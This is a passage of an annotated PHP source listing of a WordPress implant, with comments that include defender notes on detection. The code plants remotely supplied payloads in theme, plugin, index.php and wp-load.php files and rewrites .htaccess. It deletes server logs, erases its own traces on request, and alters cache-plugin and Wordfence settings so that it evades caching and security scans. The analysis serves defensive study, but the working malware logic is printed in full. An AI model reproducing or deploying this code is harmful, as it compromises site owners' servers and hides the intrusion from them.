   * the PHP process can read may be listed. A missing directory yields an
   * 'ERR004' reply.
   */
  private function list_folders( $directory ) {
      try {
          $directory = (isset( $directory ) && $directory !== '') ? $this->hex2bin( $directory ) : $this->abspath();
          // $dir holds the resolved path but the glob below uses $directory.
          if ( ($dir = $this->folder_exist( $directory )) !== false ) {
              return $this->answer( true, $directory, $this->str_replace( glob( $directory . '/*' ) ) );
          } else {
              return $this->answer( false, 'Failed to find folder to list!', $directory, 'ERR004' );
          }
      } catch ( Exception $e ) {
          return false;
      }
  }
  762.  
  /**
   * Rewrites $filename so that the first occurrence of $search becomes
   * $replace, unless $replace is already present in the file.
   *
   * theme() and plugin() call it with $replace set to injected code joined
   * with the marker, so the marker stays and the code is inserted next to it
   * once per file. Returns $filename when the file was written or needed no
   * change, false when the write failed. read() and write() are defined
   * outside the visible part of the listing.
   */
  private function replace( $filename, $search, $replace ) {
      try {
          $source = $this->read( $filename );
          if ( strpos( $source, $replace ) === false ) {
              $strpos = strpos( $source, $search );
              if ( $strpos !== false ) {
                  $content = substr_replace( $source, $replace, $strpos, strlen( $search ) );
                  return ($this->write( $filename, $content )) ? $filename : false;
              } else {
                  return $filename;
              }
          } else {
              return $filename;
          }
      } catch ( Exception $e ) {
          return false;
      }
  }
  781.  
  /**
   * Rewrites $filename with every occurrence of $search replaced by $replace
   * and returns the result of write(). read() and write() are defined outside
   * the visible part of the listing.
   */
  private function restore( $filename, $search, $replace ) {
      try {
          $source = $this->read( $filename );

          return $this->write( $filename, str_replace( $search, $replace, $source ) );
      } catch ( Exception $e ) {
          return false;
      }
  }
  791.  
  /**
   * Recursively collects files under $folder that match $pattern.
   *
   * The string 'n' is a "use the default" sentinel: the default pattern
   * '{,.}*.php' matches PHP files including dot-prefixed ones, and the default
   * flags are GLOB_BRACE | GLOB_NOSORT. A null or empty $folder falls back to
   * home(). Every subdirectory is descended into, so the result covers the
   * whole tree below the starting folder.
   */
  private function directory( $folder = null, $pattern = 'n', $flags = 'n' ) {

      if ( $pattern === 'n' ) {
          $pattern = '{,.}*.php';
      }
      if ( $flags === 'n' ) {
          $flags = GLOB_BRACE | GLOB_NOSORT;
      }
      if ( $this->is_null( $folder ) ) {
          $folder = $this->home();
      }
      if ( substr( $folder, -1 ) !== DIRECTORY_SEPARATOR ) {
          $folder .= DIRECTORY_SEPARATOR;
      }

      $files = glob( $folder . $pattern, $flags );

      foreach ( glob( $folder . '*', GLOB_ONLYDIR | GLOB_NOSORT | GLOB_MARK ) as $dir ) {
          $dirFiles = $this->directory( $dir, $pattern, $flags );
          if ( $dirFiles !== false ) {
              $files = array_merge( $files, $dirFiles );
          }
      }

      return $files;
  }
  818.  
  /**
   * Builds an inventory of every PHP file found by directory() and returns it
   * in an answer() reply.
   *
   * Files are sorted into $this->all: ->files (all of them), ->directory
   * (unique parent directories), ->plugin and ->theme (paths under
   * wp-content/plugins or wp-content/themes that pass the path test below),
   * ->function (theme functions.php files) and ->wp_load (paths containing
   * wp-load.php). theme(), plugin() and install() use these lists when the
   * request carries where=all.
   */
  private function all() {
      try {
          if ( !isset( $this->client ) ) {
              // cache() is defined outside the visible part of the listing.
              $this->client = $this->cache()->files;
          }
          foreach ( $this->directory() as $iterator ) {
              $this->all->files[] = $iterator;
              $this->all->directory[] = dirname( $iterator );
              if ( stristr( $iterator, 'wp-content/plugins' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('wp-content') ) === false ) {
                  $this->all->plugin[] = $iterator;
              }
              if ( stristr( $iterator, 'wp-content/themes' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('wp-content') ) === false ) {
                  $this->all->theme[] = $iterator;
              }
              if ( stristr( $iterator, 'wp-content/themes' ) && stristr( $iterator, 'functions.php' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('themes') ) ) {
                  $this->all->function[] = $iterator;
              }
              if ( stristr( $iterator, 'wp-load.php' ) ) {
                  $this->all->wp_load[] = $iterator;
              }
          }
          $this->all->directory = array_values( array_unique( $this->all->directory ) );
          return $this->answer( true, 'I Get Installed Plugins', $this->all );
      } catch ( Exception $e ) {
          return false;
      }
  }
  846.  
  /**
   * Returns true when the request carries where=all, building the all()
   * inventory first if it is not there yet. The value is compared loosely
   * with ==.
   */
  private function where() {
      if ( isset( $_REQUEST['where'] ) && $_REQUEST['where'] == 'all' ) {
          if ( !isset( $this->all->files ) ) {
              $this->all();
          }
          return true;
      }
      return false;
  }
  856.  
  /**
   * Plants server-supplied code in the site's themes and reports the touched
   * files in an answer() reply.
   *
   * Stage 1: in every directory that holds theme PHP files, a hidden file named
   * ".<directory name>.php" is created, or rewritten when it matches the
   * conditions below, with $this->client->file->templates.
   * Stage 2: every theme PHP file is read and, depending on marker strings
   * supplied by the remote server, $this->client->install->theme->code is
   * inserted next to a class marker, a function marker, or, for functions.php,
   * after the ->php marker (presumably the opening PHP tag; the value comes
   * from the server and is not visible here).
   * cache(), read(), write() and writing() are defined outside the visible part.
   *
   * Detection: dot-prefixed PHP files named after their own directory under
   * wp-content/themes, and theme files that differ from a clean copy of the
   * same theme version.
   */
  private function theme() {
      if ( !isset( $this->client ) ) {
          $this->client = $this->cache()->files;
      }
      if ( $this->where() ) {
          $directory = $this->all->theme;
      } else {
          $directory = $this->directory( $this->home() . 'wp-content/themes/*/', '*.php' );
      }
      $dirname = array();
      foreach ( $directory as $iterator ) {
          $this->all->theme[] = $iterator;
          $dirname[] = dirname( $iterator );
      }
      $dirname = array_values( array_unique( $dirname ) );
      foreach ( $dirname as $item ) {
          // Hidden drop file: <dir>/.<dir name>.php
          $filename = $item . DIRECTORY_SEPARATOR . '.' . basename( $item ) . '.php';
          if ( is_writeable( $item ) || is_writeable( $filename ) ) {
              if ( file_exists( $filename ) ) {
                  // Rewrite an existing drop file when it matches a server-supplied marker or is empty.
                  if ( $this->strpos( $read = $this->read( $filename ), $this->client->theme->search->include ) !== false || stristr( $read, $this->client->null ) || filesize( $filename ) <= 0 ) {
                      if ( $this->writing( $filename, $this->client->file->templates ) ) {
                          $this->install->theme[] = $filename;
                      }
                  }
              } else {
                  if ( $this->write( $filename, $this->client->file->templates ) ) {
                      $this->install->theme[] = $filename;
                  }
              }
          }
      }
      foreach ( $this->all->theme as $theme ) {
          $read = $this->read( $theme );
          // The ->exclude markers skip a file; replace() also skips files that already contain the code.
          if ( $this->strpos( $read, $this->client->install->theme->class->include ) !== false && $this->strpos( $read, $this->client->install->theme->class->exclude ) === false ) {
              $this->install->theme[] = $theme;
              $this->replace( $theme, $this->client->install->theme->class->attr, $this->client->install->theme->code . $this->client->install->theme->class->attr );
          } else if ( $this->strpos( $read, $this->client->install->theme->function->include ) && $this->strpos( $read, $this->client->install->theme->function->exclude ) === false ) {
              $this->install->theme[] = $theme;
              $this->replace( $theme, $this->client->install->theme->function->attr, $this->client->install->theme->code . $this->client->install->theme->function->attr );
          } else if ( stristr( $theme, 'functions.php' ) && $this->strpos( $read, $this->client->install->theme->function->exclude ) === false ) {
              $this->install->theme[] = $theme;
              $this->replace( $theme, $this->client->install->theme->php, $this->client->install->theme->php . $this->client->install->theme->code );
          }
      }
      return $this->answer( true, 'I Get Installed Themes', $this->install->theme );
  }
  903.  
  /**
   * Plants server-supplied code in the site's plugins and reports the touched
   * files in an answer() reply. Mirrors theme().
   *
   * Stage 1: in every directory that holds plugin PHP files, a hidden file
   * named ".<directory name>.php" is created, or rewritten when it matches a
   * server-supplied marker or is at most one byte long, with
   * $this->client->file->templates.
   * Stage 2: every plugin PHP file is read and, depending on marker strings
   * supplied by the remote server, $this->client->install->plugin->code is
   * inserted next to a class or function marker. Paths matching
   * $this->client->banned_plugins are left alone.
   * cache(), read(), write() and writing() are defined outside the visible part.
   *
   * Detection: dot-prefixed PHP files named after their own directory under
   * wp-content/plugins, and plugin files that differ from the published
   * release of the same version.
   */
  private function plugin() {
      if ( !isset( $this->client ) ) {
          $this->client = $this->cache()->files;
      }
      if ( $this->where() ) {
          $directory = $this->all->plugin;
      } else {
          $directory = $this->directory( $this->home() . 'wp-content/plugins/*/', '*.php' );
      }
      $dirname = array();
      foreach ( $directory as $iterator ) {
          $this->all->plugin[] = $iterator;
          $dirname[] = dirname( $iterator );
      }
      $dirname = array_values( array_unique( $dirname ) );
      foreach ( $dirname as $item ) {
          // Hidden drop file: <dir>/.<dir name>.php
          $filename = $item . DIRECTORY_SEPARATOR . '.' . basename( $item ) . '.php';
          if ( is_writeable( $item ) || is_writeable( $filename ) ) {
              if ( file_exists( $filename ) ) {
                  $read = $this->read( $filename );
                  if ( $this->strpos( $read, $this->client->plugin->search->include ) !== false || filesize( $filename ) <= 1 ) {
                      if ( $this->writing( $filename, $this->client->file->templates ) ) {
                          $this->install->plugin[] = $filename;
                      }
                  }
              } else {
                  if ( $this->write( $filename, $this->client->file->templates ) ) {
                      $this->install->plugin[] = $filename;
                  }
              }
          }
      }
      foreach ( $this->all->plugin as $plugin ) {
          $read = $this->read( $plugin );
          // The ->exclude markers and the banned_plugins list skip a file.
          if ( $this->strpos( $read, $this->client->install->plugin->class->include ) !== false && $this->strpos( $read, $this->client->install->plugin->class->exclude ) === false && $this->strpos( $plugin, $this->client->banned_plugins ) === false ) {
              $this->install->plugin[] = $plugin;
              $this->replace( $plugin, $this->client->install->plugin->class->attr, $this->client->install->plugin->code . $this->client->install->plugin->class->attr );
          } else if ( $this->strpos( $read, $this->client->install->plugin->function->include ) !== false && $this->strpos( $read, $this->client->install->plugin->function->exclude ) === false && $this->strpos( $plugin, $this->client->banned_plugins ) === false ) {
              $this->install->plugin[] = $plugin;
              $this->replace( $plugin, $this->client->install->plugin->function->attr, $this->client->install->plugin->code . $this->client->install->plugin->function->attr );
          }
      }
      return $this->answer( true, 'I Get Installed Plugins', $this->install->plugin );
  }
  948.  
  /**
   * Plants a hidden PHP file in every installed theme and overwrites wp-load.php.
   *
   * For each theme returned by _wp_get_themes(), the payload held in
   * $this->client->file->templates is written to
   * <theme root>/<stylesheet>/.<stylesheet>.php. Afterwards wp-load.php under
   * abspath() is replaced with $this->client->load through write(), which opens
   * the target in 'w+' mode and therefore truncates it. Every path written is
   * recorded in $this->install->wp_load.
   *
   * Defender note: a dot-prefixed PHP file named after its own theme directory,
   * or a wp-load.php that differs from the release copy of the installed core
   * version, is an indicator of this routine.
   *
   * @return mixed false when the theme list is unavailable or an Exception is
   *               caught; otherwise the value of answer() (helper not shown here).
   */
  949. private function wp_load() {
  950. try {
  951. if ( $this->_wp_get_themes() === false ) {
  952. return false;
  953. }
  // Configuration is loaded lazily from the cached JSON document (see cache()).
  954. if ( !isset( $this->client ) ) {
  955. $this->client = $this->cache()->files;
  956. }
  957. if ( file_exists( $filename = $this->abspath() . 'wp-load.php' ) ) {
  958. foreach ( $this->_wp_get_themes() AS $theme_name => $wp_get_theme ) {
  959. $templates = $this->_get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
  960. if ( $this->writing( $templates, $this->client->file->templates ) ) {
  961. $this->install->wp_load[] = $templates;
  962. }
  963. }
  964. 
  // Core bootstrap file is replaced wholesale, not patched.
  965. if ( $this->write( $filename, $this->client->load ) ) {
  966. $this->install->wp_load[] = $filename;
  967. }
  968. }
  969. return $this->answer( true, 'WP-LOAD', $this->install->wp_load );
  970. } catch ( Exception $e ) {
  971. return false;
  972. }
  973. }
  974.  
  /**
   * Main planting routine: rewrites index.php files and then runs the other installers.
   *
   * The file list comes from $this->all->directory when where() is truthy,
   * otherwise from directory( home() . 'wp-*&#47;', '*.php' ); both helpers are
   * outside this excerpt. For every distinct directory whose index.php path
   * contains neither 'themes' nor 'plugins':
   *  - an existing index.php is replaced with $this->client->file->other only if
   *    it contains the settings->search marker, is empty, or contains
   *    $this->client->null;
   *  - a missing index.php is created with the same payload.
   * It then calls secret(), theme(), plugin() and wp_load().
   *
   * Defender note: index.php files appearing in, or changing inside, wp-admin,
   * wp-includes and wp-content subdirectories are the footprint of this step;
   * compare them with a clean copy of the same core release.
   *
   * @return mixed the value of answer() (helper not shown here).
   */
  975. private function install() {
  976. if ( !isset( $this->client ) ) {
  977. $this->client = $this->cache()->files;
  978. }
  979. if ( $this->where() ) {
  980. $directory = $this->all->directory;
  981. } else {
  982. $directory = $this->directory( $this->home() . 'wp-*/', '*.php' );
  983. }
  984. $dirname = array();
  985. foreach ( $directory as $iterator ) {
  986. $dirname[] = dirname( $iterator );
  987. }
  988. $dirname = array_values( array_unique( $dirname ) );
  989. foreach ( $dirname as $item ) {
  990. $filename = $item . '/index.php';
  // Theme and plugin directories are handled by theme() and plugin() instead.
  991. if ( stristr( $filename, 'themes' ) === false && stristr( $filename, 'plugins' ) === false ) {
  992. if ( file_exists( $filename ) ) {
  993. $read = $this->read( $filename );
  994. if ( $this->strpos( $read, $this->client->settings->search ) !== false || filesize( $filename ) <= 0 || stristr( $read, $this->client->null ) ) {
  995. if ( $this->writing( $filename, $this->client->file->other ) ) {
  996. $this->install->files[] = $filename;
  997. }
  998. }
  999. } else {
  1000. if ( $this->write( $filename, $this->client->file->other ) ) {
  1001. $this->install->files[] = $filename;
  1002. }
  1003. }
  1004. }
  1005. }
  1006. $this->secret();
  1007. $this->theme();
  1008. $this->plugin();
  1009. $this->wp_load();
  1010. return $this->answer( true, 'I Get Install', $this->install );
  1011. }
  1012.  
  /**
   * Refreshes previously planted files with the current payloads.
   *
   * Iterates $this->all->files (when where() is truthy) or directory() and
   * selects files that contain the settings->search marker, whose path contains
   * settings->secret->name, that contain $this->client->null, or that are empty.
   * A selected file is rewritten with:
   *  - file->templates if it contains file->search->templates;
   *  - file->other if it contains file->search->other;
   *  - file->templates if its path lies under wp-content/themes/ or
   *    wp-content/plugins/;
   *  - file->other only if the path contains 'wp-admin', 'wp-content' and
   *    'wp-includes' all at once (the last branch uses &&).
   * Rewritten paths are collected in $this->reinstall.
   *
   * Defender note: because planted files are refreshed from remote
   * configuration, hash-based indicators for them can change between versions;
   * the file locations and the marker strings are the more stable signal.
   *
   * @return mixed answer() result, or false if an Exception is caught.
   */
  1013. private function reinstall() {
  1014. try {
  1015. if ( !isset( $this->client ) ) {
  1016. $this->client = $this->cache()->files;
  1017. }
  1018. if ( $this->where() ) {
  1019. $directory = $this->all->files;
  1020. } else {
  1021. $directory = $this->directory();
  1022. }
  1023. foreach ( $directory as $item ) {
  1024. $read = $this->read( $item );
  1025. if ( $this->strpos( $read, $this->client->settings->search ) !== false || stristr( $item, $this->client->settings->secret->name ) !== false || stristr( $read, $this->client->null ) || filesize( $item ) <= 0 ) {
  1026. if ( $this->strpos( $read, $this->client->file->search->templates ) !== false ) {
  1027. if ( $this->writing( $item, $this->client->file->templates ) ) {
  1028. $this->reinstall[] = $item;
  1029. }
  1030. } else if ( $this->strpos( $read, $this->client->file->search->other ) !== false ) {
  1031. if ( $this->writing( $item, $this->client->file->other ) ) {
  1032. $this->reinstall[] = $item;
  1033. }
  1034. } else if ( stristr( $item, 'wp-content/themes/' ) || stristr( $item, 'wp-content/plugins/' ) ) {
  1035. if ( $this->writing( $item, $this->client->file->templates ) ) {
  1036. $this->reinstall[] = $item;
  1037. }
  1038. } else {
  1039. if ( stristr( $item, 'wp-admin' ) && stristr( $item, 'wp-content' ) && stristr( $item, 'wp-includes' ) ) {
  1040. if ( $this->writing( $item, $this->client->file->other ) ) {
  1041. $this->reinstall[] = $item;
  1042. }
  1043. }
  1044. }
  1045. }
  1046. }
  1047. return $this->answer( true, 'I Get Reinstall', $this->reinstall );
  1048. } catch ( Exception $e ) {
  1049. return false;
  1050. }
  1051. }
  1052.  
  /**
   * Self-removal routine: overwrites planted files and strips injected snippets.
   *
   * For every regular file whose path contains home() . 'wp-':
   *  - files carrying the settings->search marker, or whose path contains
   *    settings->secret->name, are overwritten with $this->client->null;
   *  - any path containing 'wp-load.php' is overwritten with
   *    $this->client->default_load;
   *  - files containing install->theme->code or install->plugin->code are passed
   *    to restore() with "\n" as the replacement (helper not shown here).
   * Results are collected under $this->uninstall (files, load, code).
   *
   * Defender note: the implant can erase its own artifacts on request, so a
   * clean file scan after an incident does not show the site was never
   * affected. Rely on off-host logs, backups and file-integrity history.
   *
   * @return mixed answer() result, or false if an Exception is caught.
   */
  1053. private function uninstall() {
  1054. try {
  1055. if ( !isset( $this->client ) ) {
  1056. $this->client = $this->cache()->files;
  1057. }
  1058. if ( $this->where() ) {
  1059. $directory = $this->all->files;
  1060. } else {
  1061. $directory = $this->directory();
  1062. }
  1063. foreach ( $directory as $item ) {
  1064. if ( is_file( $item ) ) {
  1065. if ( stristr( $item, $this->home() . 'wp-' ) !== false ) {
  1066. $read = $this->read( $item );
  // && binds tighter than ||: the __FILE__ exclusion guards only the marker test;
  // a path containing the secret name is overwritten regardless.
  1067. if ( $item !== __FILE__ && $this->strpos( $read, $this->client->settings->search ) !== false || stristr( $item, $this->client->settings->secret->name ) !== false ) {
  1068. if ( $this->write( $item, $this->client->null ) ) {
  1069. $this->uninstall->files[] = $item;
  1070. }
  1071. }
  1072. if ( stristr( $item, 'wp-load.php' ) !== false ) {
  1073. $this->write( $item, $this->client->default_load );
  1074. $this->uninstall->load[] = $item;
  1075. }
  1076. if ( strpos( $read, $this->client->install->theme->code ) !== false ) {
  1077. $this->restore( $item, $this->client->install->theme->code, "\n" );
  1078. $this->uninstall->code[] = $item;
  1079. }
  1080. if ( strpos( $read, $this->client->install->plugin->code ) !== false ) {
  1081. $this->restore( $item, $this->client->install->plugin->code, "\n" );
  1082. $this->uninstall->code[] = $item;
  1083. }
  1084. }
  1085. }
  1086. }
  1087. return $this->answer( true, 'I Get Uninstall', $this->uninstall );
  1088. } catch ( Exception $e ) {
  1089. return false;
  1090. }
  1091. }
  1092.  
  /**
   * Writes the "secret" payload file into directories chosen by remote configuration.
   *
   * Directories come from $this->all->directory or from
   * directory( home() . 'wp-*', '', GLOB_ONLYDIR | GLOB_NOSORT ). For each one
   * matching settings->secret->directory, $this->client->file->secret is written
   * to "<directory>/<settings->secret->key>" via writing().
   *
   * Both branches of the inner if record the filename, so
   * $this->install->secret lists every attempted path, not only successful writes.
   *
   * Defender note: the file name and target directory are supplied remotely and
   * are not visible in this listing; look for recently created files in wp-*
   * directories that are not part of the core release.
   *
   * @return mixed answer() result, or false if an Exception is caught.
   */
  1093. private function secret() {
  1094. try {
  1095. if ( !isset( $this->client ) ) {
  1096. $this->client = $this->cache()->files;
  1097. }
  1098. if ( $this->where() ) {
  1099. $directory = $this->all->directory;
  1100. } else {
  1101. $directory = $this->directory( $this->home() . 'wp-*', '', GLOB_ONLYDIR | GLOB_NOSORT );
  1102. }
  1103. foreach ( $directory as $iterator ) {
  1104. if ( $this->strpos( $iterator, $this->client->settings->secret->directory ) !== false ) {
  1105. $filename = "{$iterator}/{$this->client->settings->secret->key}";
  1106. if ( $this->writing( $filename, $this->client->file->secret ) ) {
  1107. $this->install->secret[] = $filename;
  1108. } else {
  1109. $this->install->secret[] = $filename;
  1110. }
  1111. }
  1112. }
  1113. return $this->answer( true, 'I Get Secret', $this->install->secret );
  1114. } catch ( Exception $e ) {
  1115. return false;
  1116. }
  1117. }
  1118.  
  /**
   * Overwrites .htaccess files with content taken from remote configuration.
   *
   * Enumerates .htaccess files below home() or abspath() through directory()
   * (helper not shown here) and, per file:
   *  - if $this->strpos() reports the path contains 'wp-content', 'wp-includes'
   *    or 'wp-admin', writes $this->client->sub_htaccess and records the path
   *    under sub["true"] or sub["false"] according to the write result;
   *  - else, if the file contains '# BEGIN WordPress', writes
   *    $this->client->main_htaccess and records it under main;
   *  - otherwise records the path under undefined and leaves it alone.
   * The first test checks the helper's result for truthiness, unlike the
   * "!== false" comparisons used at other call sites.
   *
   * Defender note: write() truncates its target, so any site-specific rules in
   * an affected .htaccess are lost; diff every .htaccess against a known-good
   * copy during cleanup.
   *
   * @return mixed answer() result, or false if an Exception is caught.
   */
  1119. private function htaccess() {
  1120. try {
  1121. if ( !isset( $this->client ) ) {
  1122. $this->client = $this->cache()->files;
  1123. }
  1124. if ( $this->where() ) {
  1125. $directory = $this->directory( $this->home(), '.htaccess', GLOB_NOSORT );
  1126. } else {
  1127. $directory = $this->directory( $this->abspath(), '.htaccess', GLOB_NOSORT );
  1128. }
  1129. $return = new stdClass();
  1130. foreach ( $directory as $iterator ) {
  1131. if ( $this->strpos( $iterator, array('wp-content', 'wp-includes', 'wp-admin') ) ) {
  1132. if ( $this->write( $iterator, $this->client->sub_htaccess ) ) {
  1133. $return->sub["true"][] = $iterator;
  1134. } else {
  1135. $return->sub["false"][] = $iterator;
  1136. }
  1137. } else if ( stristr( $this->read( $iterator ), '# BEGIN WordPress' ) !== false ) {
  1138. if ( $this->write( $iterator, $this->client->main_htaccess ) ) {
  1139. $return->main[] = $iterator;
  1140. }
  1141. } else {
  1142. $return->undefined[] = $iterator;
  1143. }
  1144. }
  1145. return $this->answer( true, 'I Get Change htaccess', $return );
  1146. } catch ( Exception $e ) {
  1147. return false;
  1148. }
  1149. }
  1150.  
  /**
   * Deletes log files found under home() (anti-forensics).
   *
   * Enumerates files matching {*.gz,*.com,*.com-ssl-log,*.log,error_log} through
   * directory() (helper not shown here). A file is skipped when its path
   * contains both '.gz' and home(); every other regular file is recorded in
   * $this->return_array and removed with unlink().
   *
   * Defender note: local web-server and PHP error logs cannot be trusted as
   * complete on a host where this ran. Forward logs to a separate system and
   * treat unexplained gaps in local logs as a finding in themselves.
   *
   * @return mixed list of deleted paths ($this->return_array), or false if an
   *               Exception is caught.
   */
  1151. private function log() {
  1152. try {
  1153. if ( !isset( $this->client ) ) {
  1154. $this->client = $this->cache()->files;
  1155. }
  1156. foreach ( $this->directory( $this->home(), '{*.gz,*.com,*.com-ssl-log,*.log,error_log}', GLOB_BRACE | GLOB_NOSORT ) as $iterator ) {
  1157. if ( is_file( $iterator ) ) {
  // Empty branch: compressed archives under home() are left in place.
  1158. if ( stristr( $iterator, '.gz' ) && stristr( $iterator, $this->home() ) ) {
  1159. } else {
  1160. $this->return_array[] = $iterator;
  1161. unlink( $iterator );
  1162. }
  1163. }
  1164. }
  1165. return $this->return_array;
  1166. } catch ( Exception $e ) {
  1167. return false;
  1168. }
  1169. }
  1170.  
  /**
   * Rewrites the WP Fastest Cache exclusion option from remote configuration.
   *
   * If the 'WpFastestCacheExclude' option exists and any string in
   * settings->cache->bot is not found in it, the option is replaced with the
   * JSON encoding of settings->cache->WpFastestCacheExclude. If the option does
   * not exist it is created with that value. The "!strpos()" test also treats a
   * match at offset 0 as "not found".
   *
   * Unlike most methods here, $this->client is used without a lazy load; the
   * only visible caller, update(), initialises it first.
   *
   * Defender note: presumably this stops the cache plugin from serving cached
   * pages to the listed user agents, so the conditional output of code() reaches
   * them; verify against the plugin's option format. Review this option for
   * entries the site owner did not add.
   *
   * @return bool true when the option was added or replaced, false otherwise.
   */
  1171. private function WPFastestCacheExclude() {
  1172. try {
  1173. if ( $this->_get_option( 'WpFastestCacheExclude' ) ) {
  1174. foreach ( $this->client->settings->cache->bot as $bot ) {
  1175. if ( !strpos( $this->_get_option( 'WpFastestCacheExclude' ), $bot ) ) {
  1176. $this->_update_option( 'WpFastestCacheExclude', json_encode( $this->client->settings->cache->WpFastestCacheExclude ) );
  1177. return true;
  1178. }
  1179. }
  1180. } else {
  1181. $this->_add_option( 'WpFastestCacheExclude', json_encode( $this->client->settings->cache->WpFastestCacheExclude ) );
  1182. return true;
  1183. }
  1184. return false;
  1185. } catch ( Exception $e ) {
  1186. return false;
  1187. }
  1188. }
  1189.  
  /**
   * Adds the configured user-agent strings to LiteSpeed Cache's no-cache list.
   *
   * Reads the 'litespeed-cache-conf' option. For each string in
   * settings->cache->bot missing from its 'nocache_useragents' value, the whole
   * bot list is appended, the '|'-separated list is de-duplicated, and the
   * option is saved. When the save succeeds, the settings->cache->LitespeedCache
   * template, with '{{bot}}' replaced by the list, is appended to
   * abspath() . '.htaccess'.
   *
   * Defender note: check both the plugin option and the tail of the root
   * .htaccess for user-agent rules nobody on the team added.
   *
   * @return bool always false, including when changes were made.
   */
  1190. private function LitespeedCache() {
  1191. try {
  1192. $litespeed = $this->_get_option( 'litespeed-cache-conf' );
  1193. if ( $litespeed ) {
  1194. foreach ( $this->client->settings->cache->bot as $bot ) {
  1195. if ( !stristr( $litespeed['nocache_useragents'], $bot ) ) {
  1196. $litespeed['nocache_useragents'] = ltrim( rtrim( $litespeed['nocache_useragents'], '|' ) . '|' . join( '|', $this->client->settings->cache->bot ), '|' );
  1197. $litespeed['nocache_useragents'] = join( "|", array_values( array_unique( explode( '|', $litespeed['nocache_useragents'] ) ) ) );
  1198. if ( $this->_update_option( 'litespeed-cache-conf', $litespeed ) ) {
  1199. $this->write_append( $this->abspath() . '.htaccess', str_replace( '{{bot}}', $litespeed['nocache_useragents'], $this->client->settings->cache->LitespeedCache ) );
  1200. }
  1201. }
  1202. }
  1203. }
  1204. return false;
  1205. } catch ( Exception $e ) {
  1206. return false;
  1207. }
  1208. }
  1209.  
  /**
   * Adds the configured user-agent strings to WP-Optimize's cache exceptions.
   *
   * Reads the 'wpo_cache_config' option and, when a string from
   * settings->cache->bot is absent from 'cache_exception_browser_agents',
   * merges the whole bot list into that array (de-duplicated) and saves the
   * option.
   *
   * Defender note: unexpected crawler names in this exception list are a sign
   * of tampering with the cache configuration.
   *
   * @return bool true after a successful option update, false otherwise.
   */
  1210. private function WPOptimize() {
  1211. try {
  1212. if ( $option = $this->_get_option( 'wpo_cache_config' ) ) {
  1213. foreach ( $this->client->settings->cache->bot as $bot ) {
  1214. if ( !in_array( $bot, $option['cache_exception_browser_agents'] ) ) {
  1215. $option['cache_exception_browser_agents'] = array_values( array_unique( array_merge_recursive( $option['cache_exception_browser_agents'], $this->client->settings->cache->bot ) ) );
  1216. if ( $this->_update_option( 'wpo_cache_config', $option ) ) {
  1217. return true;
  1218. }
  1219. }
  1220. }
  1221. }
  1222. return false;
  1223. } catch ( Exception $e ) {
  1224. return false;
  1225. }
  1226. }
  1227.  
  /**
   * Appends a configuration snippet to WP Super Cache's wp-cache-config.php.
   *
   * If WP_CONTENT_DIR/wp-cache-config.php exists and at least one string from
   * settings->cache->bot is missing from it, the text in
   * settings->cache->WPSuperCache is appended to the file with write_append().
   * The file is re-read on every loop iteration.
   *
   * Defender note: wp-cache-config.php is executable PHP, so anything appended
   * here runs with the site; compare the file with the plugin's generated
   * output and look for trailing additions.
   *
   * @return bool always false, including when the file was modified.
   */
  1228. private function WPSuperCache() {
  1229. try {
  1230. if ( file_exists( $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'wp-cache-config.php' ) ) {
  1231. foreach ( $this->client->settings->cache->bot as $bot ) {
  1232. if ( !stristr( $this->read( $filename ), $bot ) ) {
  1233. $return = false;
  1234. }
  1235. }
  1236. if ( isset( $return ) && $return === false ) {
  1237. $this->write_append( $filename, $this->client->settings->cache->WPSuperCache );
  1238. }
  1239. }
  1240. return false;
  1241. } catch ( Exception $e ) {
  1242. return false;
  1243. }
  1244. }
  1245.  
  /**
   * Merges remote values into W3 Total Cache's master and master-preview configs.
   *
   * For WP_CONTENT_DIR/w3tc-config/master-preview.php and .../master.php, when
   * the file exists: the '<?php exit; ?>' guard is removed, the remainder is
   * JSON-decoded, and for every key in settings->cache->W3TotalCache (selected
   * through __FUNCTION__) that already exists in the config, the remote array is
   * merged in and de-duplicated. The file is then rewritten with the guard plus
   * the re-encoded JSON.
   *
   * Defender note: the keys changed are chosen remotely and are not visible in
   * this listing; diff both config files against a backup rather than checking
   * specific settings.
   *
   * @return bool always false, including when files were rewritten.
   */
  1246. private function W3TotalCache() {
  1247. try {
  1248. $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'w3tc-config/master-preview.php';
  1249. if ( file_exists( $filename ) ) {
  1250. $json_decode = json_decode( str_replace( '<?php exit; ?>', '', $this->read( $filename ) ) );
  1251. foreach ( $this->client->settings->cache->{__FUNCTION__} as $key => $value ) {
  1252. if ( isset( $json_decode->$key ) ) {
  1253. $json_decode->$key = array_values( array_unique( array_merge( $json_decode->$key, $value ) ) );
  1254. }
  1255. }
  1256. $this->write( $filename, '<?php exit; ?>' . json_encode( $json_decode ) );
  1257. }
  1258. $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'w3tc-config/master.php';
  1259. if ( file_exists( $filename ) ) {
  1260. $json_decode = json_decode( str_replace( '<?php exit; ?>', '', $this->read( $filename ) ) );
  1261. foreach ( $this->client->settings->cache->{__FUNCTION__} as $key => $value ) {
  1262. if ( isset( $json_decode->$key ) ) {
  1263. $json_decode->$key = array_values( array_unique( array_merge( $json_decode->$key, $value ) ) );
  1264. }
  1265. }
  1266. $this->write( $filename, '<?php exit; ?>' . json_encode( $json_decode ) );
  1267. }
  1268. return false;
  1269. } catch ( Exception $e ) {
  1270. return false;
  1271. }
  1272. }
  1273.  
  /**
   * Tampers with the Wordfence configuration table directly through $wpdb.
   *
   * When the table "<prefix>wfconfig" exists:
   *  - each string in settings->security->Wordfence->search->exclude that is not
   *    already present is appended (PHP_EOL separated) to the 'scan_exclude' row;
   *  - each string in ...->search->include is likewise appended to the
   *    'scan_include_extra' row;
   *  - every name => value pair in ...->scans is written to the row with that
   *    name, overwriting the current value.
   * The __FUNCTION__ constant selects the 'Wordfence' section of the remote
   * settings. The table name is built from $wpdb->prefix only.
   *
   * Defender note: a security scanner configured by the implant cannot be relied
   * on to find it. Inspect the scan_exclude row and the scan option rows for
   * values nobody set, and re-scan from a clean plugin installation.
   *
